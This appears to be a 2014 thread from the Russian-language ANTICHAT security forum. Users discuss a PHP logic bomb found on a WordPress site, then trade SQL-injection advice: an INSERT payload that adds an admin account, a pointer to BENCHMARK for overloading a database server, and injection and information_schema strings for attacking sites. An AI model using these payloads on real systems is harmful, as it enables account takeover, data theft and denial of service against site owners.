ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

27.08.2014, 11:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 21918
Репутация:
6
|
|
B1t.exe, возможно закладка от программера на случай кидка.
|
|
|
|

27.08.2014, 12:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от B1t.exe
B1t.exe said:
ребят , на сайте пентестер нашел один файл *.php
содержимое такое:

Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))
насколько это верно? движок сайта - WP.
Почти верно, с тем отличием что .php удалятся не "на сайте", а только в той же директории, что и сам файл.
Строго говоря, да, это логическая бомба, но очень примитивная и никак не замаскированная.
Сообщение от None
а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили?
просто смысл удаления всех файлов.. хочу понять мотив.
Выше вы упомянули, что сайт на wp. В wp такого кода явно нет, как и "разработчика сайта" в данном случае. Вариантов тут масса, и как уже сказали, это может быть делом рук той мартышки, что ставила вордпресс.
>> сайт взломали и ставили?
Этот вопрос вам надо задавать "пентестеру", а не здесь. Смотрите логи(что может быть проблемно, если ворпресс на дешевом\херовом шаред-хостинге), смотрите даты и все что есть по сайту. Одно можно сказать наверняка - в вордпрессе такого нет, что очевидно. К тому же, простое удаление особо бесполезно, т.к. бекапы все-таки принято делать. Скорее всего, где-нибудь есть аналогично оставленное выполнение кода.
|
|
|
|

27.08.2014, 13:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 755326
Репутация:
99
|
|
возможно ли использовать sql инъекцию не только на чтение данных но и на запись ?
например заменить хеш пароля на извесный и провести авторизацию в админку
|
|
|
|

27.08.2014, 13:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 21918
Репутация:
6
|
|
GAiN, инъекции бывают в INSERT/UPDATE - соответственно, да, возможно.
Пример, регистрация:
Код:
Code:
$username = $_POST['username'];
$password = $_POST['password'];
INSERT INTO users ('$username', '$password');
Инъекция:
Код:
Code:
username=...&password=...'),('admin', 'pass')#
|
|
|
|

28.08.2014, 13:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 4766
Репутация:
0
|
|
А не поделиться кто нить списком запросов к бд, через адресную строку. Для нагрузки на сервер.
|
|
|
|

28.08.2014, 15:27
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от bumer
bumer said:
А не поделиться кто нить списком запросов к бд, через адресную строку. Для нагрузки на сервер.
/showpost.php?p=407227&postcount=3 читай про BENCHMARK
|
|
|

28.08.2014, 16:25
|
|
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
Провел на форуме: 1436858
Репутация:
171
|
|
Подскажите как раскрутить эту иньекцию:
Сообщение от None
http://site.ru/announcements/123'/
Ошибка базы данных при выполнении запроса: SELECT m.material_id, material_title FROM material m INNER JOIN rubric_material rm ON m.material_id = rm.material_id WHERE rubric_id = '2545' AND material_file = '123'' .
MySQL:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123''' at line 6
|
|
|

28.08.2014, 17:31
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от BuG_4F
BuG_4F said:
Подскажите как раскрутить эту иньекцию:
http://site.ru/announcements/123'+and+1=1+--+/
и по накатанной, а дальше если, что не так, иди к шайтану.
|
|
|

30.08.2014, 15:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 12164
Репутация:
1
|
|
Парни, нашел уязвимость пытаюсь раскрутить ее через blind injection.
Узнал версию, имя базы, но при обращении к ней выдает ошибку
Invalid query: SELECT command denied to user 'xxxxxx'@'xxxxx' for table 'users'
Значит, я никак не раскручу скулю или есть варианты?
|
|
|
|

30.08.2014, 16:32
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от billybonse
billybonse said:
Парни, нашел уязвимость пытаюсь раскрутить ее через blind injection.
Узнал версию, имя базы, но при обращении к ней выдает ошибку
Invalid query: SELECT command denied to user 'xxxxxx'@'xxxxx' for table 'users'
Значит, я никак не раскручу скулю или есть варианты?
скорее всего обращаешься к таблице users из базы mysql, а доступ к нему не всегда есть.
ищи подходящие таблицы в текущей базе
select table_name from information_schema.tables where table_schema=database()
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|